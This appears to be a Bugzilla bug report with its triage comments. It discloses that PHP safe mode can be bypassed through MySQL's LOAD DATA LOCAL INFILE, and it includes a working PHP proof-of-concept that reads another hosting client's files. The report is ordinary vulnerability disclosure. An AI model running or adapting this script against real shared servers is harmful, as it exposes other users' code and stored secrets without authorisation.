From Bugzilla Helper: User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461) Description of problem: By using a flaw in PHP+Mysql query, somebody can bypass safe mode. Version-Release number of selected component (if applicable): How reproducible: Always Steps to Reproduce: 1. Use the script: $host = 'localhost'; $user = 'root'; $pass = 'letmein'; $db = 'teste'; $filename = '/home/othercliente/myscript.php'; /* File to grab from [local] server */ $local = true; /* Read from local filesystem */ $local = $local ? 'LOCAL' : ''; $sql = array ( "USE $db", 'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)', "LOAD DATA $local INFILE '$filename' INTO TABLE $tbl FIELDS " . "TERMINATED BY '__THIS_NEVER_HAPPENS__' " . "ESCAPED BY '' " . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'", "SELECT a FROM $tbl LIMIT 1" ); Header ('Content-type: text/plain'); mysql_connect ($host, $user, $pass); foreach ($sql as $statement) { $q = mysql_query ($statement); if ($q == false) die ( "FAILED: " . $statement . "\n" . "REASON: " . mysql_error () . "\n" ); if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue; echo $r [0]; mysql_free_result ($q); } 2. Call the script using wget http://server/script Actual Results: You can view the source of the other client Additional info:
rpm -q php I need to know which one it is please cheers Phil =--=
php: 4.0.6-7 php-mysql: 4.0.6-7 It's configured as a module in Apache.
This is not a bug in PHP. This is a potential bug with MySQL, but php' safe mode cannot prevent this. PHP can only protect internal php functions, and mysql_* use the mysql client library. I'm moving this to the MySQL component, as it can only be handled there.
This is not a bug in mysql, it does what you want and it can do. Don't set up unsafe scripts